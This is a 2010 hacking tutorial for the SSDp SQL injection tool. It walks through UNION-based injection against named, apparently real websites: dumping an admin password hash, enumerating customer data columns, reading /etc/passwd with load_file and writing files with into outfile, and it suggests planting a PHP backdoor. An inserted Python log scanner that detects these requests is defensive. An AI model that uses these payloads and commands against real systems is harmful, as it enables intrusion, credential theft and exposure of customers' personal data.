
Simple Sqli Dumper

This document introduces the Simple SQLi Dumper (SSDp) tool for finding vulnerabilities in MySQL databases. It provides instructions on downloading and using SSDp to find the database name, tables, columns, and dump data by exploiting SQL injection vulnerabilities. Examples are given to demonstrate finding the magic number, database information, reading and writing files, and brute forcing tables and columns. The document encourages users to only use this tool for educational purposes.

Uploaded by

Alex Rozack
Copyright
© Attribution Non-Commercial (BY-NC)

SIMPLE SQLI DUMPER V5.

March 22, 2010 by NoGe in Labels: vulnerabilities, linux, tutorial, mixed tutorial



[o] attention

USE THIS TOOL FOR EDUCATIONAL PURPOSES ONLY.
WE ARE NOT RESPONSIBLE FOR ANY DAMAGE OR IMPROPER USE OF THIS TOOL.
USE IT AT YOUR OWN RISK!!

SSDp coded by Vrs-hCk ( ander[at]antisecurity[dot]org )


SSDp How To by NoGe ( mario[at]antisecurity[dot]org )

[o] what is SSDp?

SSDp is a useful penetration testing tool for finding bugs, errors or vulnerabilities in MySQL databases.

[o] download SSDp v5.1

http://okedeh.co.tv/ssdp51.tar.gz
http://pacenoge.org/tool/ssdp51.tar.gz

[o] function

- SQL Injection
- Operating System Function
- Dump Database
- Extract Database Schema
- Search Columns Name
- Read File (read only)
- Create File (read only)
- Brute Table & Column

[o] command and option

[root@evilc0de noge]# perl ssdp.pl -h

|-----------------------------------------------------------------------------|
| Usage: perl ssdp.pl [options]                                               |
|                                                                             |
| -u [SQLi URL]       target with id parameter or sqli url with c0li string   |
| -e [sqli end tag]   sql injection end tag (default: "--")                   |
| -d [database name]  this option should not be used (default: @@database)    |
| -t [table name]     table_name                                              |
| -c [columns name]   column_name (example: id,user,pass,email)               |
| -s [space code]     SPACE code: +,/**/,%20 (default: "+")                   |
| -f [max field]      max field to get magic number (default: 123)            |
| -start [num]        row number to begin dumping data                        |
| -stop [num]         row number to stop dumping                              |
| -where [query]      your special dumping query                              |
|                                                                             |
| -info               Get MySQL Information       [MySQL v4+]                 |
| -dbase              Concat Databases            [MySQL v5+]                 |
| -table              Concat Tables               [MySQL v5+]                 |
| -column             Concat Columns              [MySQL v5+]                 |
| -tabcol             Concat Tables with Columns  [MySQL v5+]                 |
| -find               Search Columns Name         [MySQL v5+]                 |
| -magic              Find Magic Number           [MySQL v4+]                 |
| -dump               Dump Data                   [MySQL v4+]                 |
| -brute              Fuzzing Tables & Columns    [MySQL v4+]                 |
|                                                                             |
| -log [file name]    file name to save ssdp data (default: ssdp.log)         |
| -p [http proxy]     hostname:port                                           |
|-----------------------------------------------------------------------------|

[o] proof of concept

[0x01] magic number (null column).

first of all we have to find the null column (magic number).
the null column is used to execute our SQL query.

# perl ssdp.pl -u [target URL] -magic

[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2 -magic

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, --help

[+] URL: http://www.460productions.com/store.php?cat=2
[+] End Tag: --

Attempting to find the magic number...

[+] Testing: 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,

[+] Field Length : 24
[+] Magic Number : 1
[+] URL Injection: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24

Showing MySQL Information ...

[+] Database: 460store
[+] User: [email protected]
[+] Version: 5.0.51a-log
[+] System: redhat-linux-gnu
[+] Access to "mysql" Database: No
[+] Read File "/etc/passwd": Yes (w00t)
[+] Create File "/tmp/c0li-430.txt": Yes (w00t)

Done.

our magic number is 1, and it will be replaced with the "c0li" string.
we can see the database information and the operating system too.

[0x02] finding table

now we use the URL that includes the "c0li" string to find tables & columns.

# perl ssdp.pl -u [c0li URL] -table

[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -table

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: --
[+] Database Name: database()
[+] Number of Tables: 18

Showing tables ...

[1] aspect_ratio(2)
[2] audio_format(3)
[3] category(7)
[4] customer(200)
[5] deposit(11)
[6] discount_group(9)
[7] discount_group_price(10)
[8] order()
[9] order_item(261)
[10] order_source(5)
[11] order_status(4)
[12] order_type(2)
[13] payment_type(4)
[14] product(30)
[15] product_group(17)
[16] security(1)
[17] shopping_cart(0)
[18] user_session(68)

Done.

that is the list of all tables in database()

[0x03] finding column

let's see the columns of the table called "security".

# perl ssdp.pl -u [c0li URL] -t [table] -column

[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -t security -column

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: --
[+] Database Name: database()
[+] Table Name: security
[+] Number of Columns: 5

Showing columns from table "security" ...

[+] security(1): user_id,username,password,admin,last_login

Done.

aha! we got columns called "username" and "password".


[0x04] dumping data

now we'll see the information inside those columns.. :)

# perl ssdp.pl -u [c0li URL] -t [table] -c [column],[column] -dump

[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -t security -c username,password -dump

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: --
[+] Database Name: database()
[+] Table Name: security
[+] Column Name: username,password
[+] Data Count: 1

Dumping Data ...

[1] admin : 2ec20101734c754d

Done.

we got the admin username and password hash. :D

ok, i have shown you how to find the magic number, tables and columns, and how to dump data from the columns using SSDp.

[0x05] search column name (-find)

now i'll show you how to use the -find option (Search Columns Name).
i'll try to search for columns with the keyword "address". it requires the -c option (column).

# perl ssdp.pl -u [c0li URL] -d [database name] -c [keyword] -find

[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -d 460store -c address -find

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: --
[+] Database Name: 460store
[+] Column Name string to search: address

Searching for Columns Path ...

[+] Columns Found:

[1] 460store.customer.email_address
[2] 460store.customer.address_line1
[3] 460store.customer.address_line2
[4] 460store.customer.address_city
[5] 460store.customer.address_state
[6] 460store.customer.address_zip
[7] 460store.customer.address_country
[8] 460store.customer.address_name

Done.

found columns with the word "address" in table "customer". easy, right? :p

[0x06] read & create file (read only)

now let's see Read File (read only) & Create File (read only).
why read only? coz this function is designed just to test whether we can read a file or not. to inject, we do it manually.. :(
as you can see, the first time we find the magic number you'll find these lines.

[+] Read File "/etc/passwd" : Yes (w00t)
[+] Create File "/tmp/c0li-159.txt" : Yes (w00t)

it means we can read (load_file) the /etc/passwd file on the target, and we can also create a file in the /tmp directory.
to use load_file you need to convert /etc/passwd into hexadecimal. http://pacenoge.org/encdec

http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,load_file(0x2f6574632f706173737764),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

the result will be like this.


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh

let's create some file in /tmp directory. :)

http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,"Simple SQLi Dumper",8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+into+outfile+"/tmp/ssdp.txt"--

the URL above means we write "Simple SQLi Dumper" into ssdp.txt, located in the /tmp directory.
to see if it works or not, let's read /tmp/ssdp.txt using the load_file function. don't forget to convert it first.

http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,load_file(0x2f746d702f737364702e747874),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

and you will see result like this.

1 2 3 4 5 6 Simple SQLi Dumper 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24

that's the word we wrote in /tmp/ssdp.txt.

what can we do with the create file vuln? we can make a php file as a backdoor on the target if we know the directory path. :))
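
Added example (not part of the original how-to and not SSDp code): the requests shown in [0x01] to [0x06] leave a recognisable pattern in a web server access log, and this sketch flags it after undoing the three space codes from the -s option (+, %20, /**/) and decodes hex load_file arguments so the targeted path is visible. The log lines, rule names and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format); the addresses are
# documentation ranges and the requests mirror the shapes shown in this how-to.
SAMPLE_LOG = """\
198.51.100.4 - - [22/Mar/2010:10:00:01 +0000] "GET /store.php?cat=2 HTTP/1.1" 200 5120
203.0.113.9 - - [22/Mar/2010:10:00:07 +0000] "GET /store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5-- HTTP/1.1" 200 812
203.0.113.9 - - [22/Mar/2010:10:00:09 +0000] "GET /store.php?cat=2/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,3,load_file(0x2f6574632f706173737764),5-- HTTP/1.1" 200 990
203.0.113.9 - - [22/Mar/2010:10:00:12 +0000] "GET /store.php?cat=2%20AND%201=2%20UNION%20ALL%20SELECT%201,2,3,4,5%20into%20outfile%20%22/tmp/x.txt%22-- HTTP/1.1" 200 640
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) HTTP/[\d.]+" \d{3}')
RULES = {  # hypothetical rule names, evaluated on the normalized query string
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "select_column_list": re.compile(r"\bselect\s+(?:[^,\s]+\s*,\s*){3,}"),
    "load_file": re.compile(r"\bload_file\s*\("),
    "into_outfile": re.compile(r"\binto\s+(?:out|dump)file\b"),
    "c0li_marker": re.compile(r"\bc0li\b"),
}
HEX_ARG = re.compile(r"load_file\s*\(\s*0x([0-9a-f]+)\s*\)")

def normalize(query):
    """Undo the +, %20 and /**/ space codes, collapse whitespace, lowercase."""
    text = unquote_plus(query)
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text).lower()

def classify(target):
    """Return (matched rule names, decoded load_file paths) for a request target."""
    text = normalize(target.partition("?")[2])
    tags = [name for name, rx in RULES.items() if rx.search(text)]
    paths = [bytes.fromhex(h).decode("latin-1")
             for h in HEX_ARG.findall(text) if len(h) % 2 == 0]
    return tags, paths

def scan(log_text):
    """Return (client ip, tags, paths) for every log line that matches a rule."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            tags, paths = classify(m.group(2))
            if tags:
                findings.append((m.group(1), tags, paths))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

load_file() and into outfile only work when the MySQL account used by the web application holds the FILE privilege, so a hit on either of those two rules also points at an over-privileged database user.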

[0x07] brute MySQL v4

guessing tables & columns for MySQL v4.
you can add your own table names & column names by editing the files called tables.dict & columns.dict.

# perl ssdp.pl -u [c0li URL] -brute

[root@evilc0de noge]# perl ssdp.pl -u http://www.samra.com/product_details.php?product_id=322+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,c0li,33 -brute

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sun Mar 21 19:31:42 2010
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.samra.com/product_details.php?product_id=322+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,c0li,33
[+] SQLi End Tag: --
Finding Tables & Columns ...

[1] admin_user: username,password,email,adminid,adminname,phone,

Done.

found table "admin_user"
found columns "username" "password" "email" "adminid" "adminname" "phone"

[0x08] conclusion

by using SSDp, it's very easy to find an SQL injection vulnerability in a vulnerable parameter or string.
this tool also performs SQL injection tests against the vulnerable website and tries to dump data from the MySQL database.
you can dump data from MySQL database columns and it works nicely.
you can gather secret and confidential data such as usernames, passwords, credit card numbers, etc.
but i suggest using this tool in the right way. okay dude?? :p

[0x09] references

perl ssdp.pl -h
http://en.wikipedia.org/wiki/SQL_injection
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

[0x10] greetz ^^

Vrs-hCk OoN_Boy paman zxvf angel stardustmemory


s4va xr00tb0y S3T4N pizzyroot matthews martfella

[MH] MainHack BrotherHood - [SiD] ServerIsDown UnderGrounD - AntiSecurity.org Team
